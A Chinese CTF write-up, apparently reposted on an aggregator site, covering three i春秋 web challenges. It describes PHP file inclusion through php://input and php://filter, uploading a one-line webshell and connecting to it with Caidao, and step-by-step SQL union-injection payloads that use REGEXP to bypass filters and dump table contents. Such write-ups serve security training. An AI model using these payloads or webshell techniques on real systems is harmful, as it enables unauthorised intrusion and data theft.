i春秋 web（2）

2021-04-18 19:26

阅读：505

标签：打开菜刀 lte 就会显示 regex rip put cat

include

upload

SQL

include

首先是一段代码

技术图片

提示说是文件包含查找一下allow_url_include,是打开的，那我们就可以用php://input

技术图片

我先用先用system执行ls命令查看下目录

技术图片

然后用php://filter来读取文件

技术图片

就会有一串base64 技术图片

解码得到flag

技术图片

upload

首先看的是上传文件的界面，说是可以上传任意文件，那就先上传一句话咯，在我上传之后，点击上传成功就能查看上传的文件，

技术图片

技术图片

发现我的一句话的

上传之后点击上传成功查看没有内容，应该是被解析了，所以用菜刀连接

技术图片

技术图片

技术图片

SQL

对于这个题提示说是注入，我们就尝试注入，我比较笨，试了好多都没有试出来，百度了大佬的wp才发现，他是过滤了select、和=，

而且，一般绕过方式不行，得用绕过，长知识啊，然后就开始手工union注入，因为=也被过滤了，所以用REGEXP代替

首先查看显示位

技术图片

然后获取数据库：?id=1 union select 1,(select(database()) ),3

技术图片

然后获取表，?id=1 union select 1,(select(group_concat(table_name))from information_schema.tables where table_schema REGEXP ‘sqli‘),3

技术图片

然后获取字段名：?id=1 union select 1,(select(group_concat(column_name))from information_schema.columns where table_name REGEXP ‘info‘),3

技术图片

然后获取字段内容：?id=1 union select 1,(select(group_concat(flAg_T5ZNdrm))from info ),3

技术图片

i春秋 web（2）

标签：打开菜刀 lte 就会显示 regex rip put cat

原文地址：https://www.cnblogs.com/qie-date/p/12274988.html

上一篇：SSM框架中Json数据出现乱码问题

下一篇：Ethical Hacking - Web Penetration Testing(7)

文章来自：搜素材网的编程语言模块，转载请注明文章出处。
文章标题：i春秋 web（2）
文章链接：http://soscw.com/index.php/essay/76340.html

评论

亲，登录后才可以留言！

关于我们 | 版权声明 | 常见问题 | 素材投稿 | 联系我们 | 网站地图 |

搜素材网素材除本站原创外均由用户分享，若发现权利被侵害，请联系及时联系我们，我们会在第一时间进行处理。

特别说明：本站所有资源除本站原创外仅供学习与参考，请勿用于商业用途,如有侵犯您的版权请联系客服服务QQ：

点击这里给我发消息

Copyright © 2024 soscw.com 搜素材网素材网版权所有蜀ICP备18015633号-1